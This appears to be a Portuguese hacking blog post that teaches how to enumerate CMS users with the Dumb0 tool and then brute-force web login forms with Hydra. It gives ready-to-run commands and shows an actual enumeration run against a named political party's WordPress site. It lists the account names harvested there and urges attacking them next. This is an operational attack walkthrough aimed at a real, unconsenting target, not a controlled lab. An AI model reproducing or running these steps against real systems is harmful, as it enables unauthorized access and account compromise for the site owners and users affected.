Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador extração. Mostrar todas as postagens
Mostrando postagens com marcador extração. Mostrar todas as postagens

segunda-feira, 23 de junho de 2014

[Dumb0] extração de usuários + HYDRA força bruta em formularios web


 [Dumb0] + HYDRA

 Dumb0 é uma ferramenta possibilita extrair usuários ativos de plataformas CMS mais populares.

baixar: git clone https://github.com/0verl0ad/Dumb0.git
projeto: https://github.com/0verl0ad/Dumb0/


CMS que podemos extrair:
            SMF        --         Simple Machine Forums
            IPB          --        Invision Power Board
            XEN        --        Xen Foro
            VB          --        vBulletin
            myBB     --
            useBB    --
            vanilla  --
            bbPress  --
            WP     --        WordPress
            SPIP     --        SPIP CMS
            DRUPAL   --        Drupal
            MOODLE      --        Moodle
            BEE     --        Beehive Forums
            FLUX     --        fluxBB
            FUD     --        FUDforum
            punBB     --
            ACM     --        AcmImBoard XD
            BURN     --        Burning Board
            COM     --        Community Servers
            deluxeBB --       
            fusionBB --
            JFORUM     --
            JITBIT      --        Jibit ASPNetForum
            JIVE     --        Jive Forums
            NEAR     --        Near Forums
            OVBB     --       
            TikiWiki --        TikiWiki CMS-Groupware
Usando:
 Dumb0 é uma ferramenta possibilita extrair usuários ativos de plataformas CMS mais populares.

Comando
Dumb0 ex:
perl dumb0.pl --url=[SEU_ALVO URL] --type=[CMS/FORUM ID] {OPTIONS: --log=[SESSION COOKIE] --file[FILENAME] }


Uma vez identificado o CMS-usuarios podemos direcionar um ataque de força bruta contra eles via hydra.
Usando Hydra:

hydra URL http-form-post "/Path/archivo.php:ParametroUser=^USER^&parametroPass=^PASS^:MSG QUE INDICA FALHA" -L seus_user.txt -P senhas.txt

Sintaxe simples fica assim :
 --------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o out.txt -t 1 -f 127.0.0.1 http-post-form "/login/logar.php:user=^USER^&pass=^PASS^:Usuario ou senha invalida"

--------------------------------------------------------------------------------
 Para criar esta sintaxe foi preciso : Valor do atributo action do
 <form> : logar.php Valor do atributo referente ao nome e senha de usuário nas tags <input> dentro do <form>: name , pass Mensagem de erro ou parte dela: "Usuário ou senha invalida" - O uso do caractere coringa é permitido : .*senha invalida - É possível usar uma mensagem de sucesso adicionando S= antes da mensagem :
 --------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o out.txt -t 1 -f -w 15 127.0.0.1 http-post-form "/login/logar.php:user=^USER^&pass=^PASS^:S=Logado com sucesso"

--------------------------------------------------------------------------------


Exemplo de resultado Dumb0:
alvo:http://www.psdb-mg.org.br/

perl Dumb0.pl --type=WP --url='http://www.psdb-mg.org.br/' --file='ps.txt'

RESULTADO:

[!] Dumping users from http://www.psdb-mg.org.br/...

[+] Posible user found ~> admin &#8211; PSDB - MG
[+] Posible user found ~> psdb &#8211; PSDB - MG
[+] Posible user found ~> psdbjovem &#8211; PSDB - MG
[+] Posible user found ~> psdbmulher &#8211; PSDB - MG
[+] Posible user found ~> psdbsindical &#8211; PSDB - MG
[+] Posible user found ~> itv &#8211; PSDB - MG
[+] Posible user found ~> Alias &#8211; PSDB - MG
[+] Posible user found ~> tucanafro &#8211; PSDB - MG
[!] Work finished


Depois de terminado o scan de users, agora direcionar seu ataque de força bruta com Hydra.

REF:http://blog.0verl0ad.com/2014/02/dumb0pl-herramienta-para-extraer.html
REF:http://www.exploit-db.com/papers/18939/